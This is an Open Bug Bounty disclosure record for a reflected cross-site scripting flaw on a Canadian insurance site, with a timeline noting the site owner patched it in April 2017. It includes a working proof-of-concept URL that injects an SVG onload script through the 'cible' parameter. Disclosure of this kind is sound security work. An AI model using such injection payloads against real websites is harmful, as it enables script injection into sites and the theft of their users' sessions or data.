dfsinvestmentinsurance.ca XSS vulnerability

2017-01-11T01:54:00
ID OBB:205383
Type openbugbounty
Reporter Spam404
Modified 2017-04-05T18:27:00

Description

Vulnerable URL:
http://www.dfsinvestmentinsurance.ca/en/Pages/sign-up-for-e-statements.aspx?cible=1%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 9523927
VIP website status:| No
Check dfsinvestmentinsurance.ca SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 11 January, 2017 01:54 GMT
Generic security notifications sent to website owner| 11 January, 2017 01:56 GMT
Vulnerability details disclosed by researcher| 5 April, 2017 02:13 GMT
Vulnerability patched by the website owner| 5 April, 2017 18:27 GMT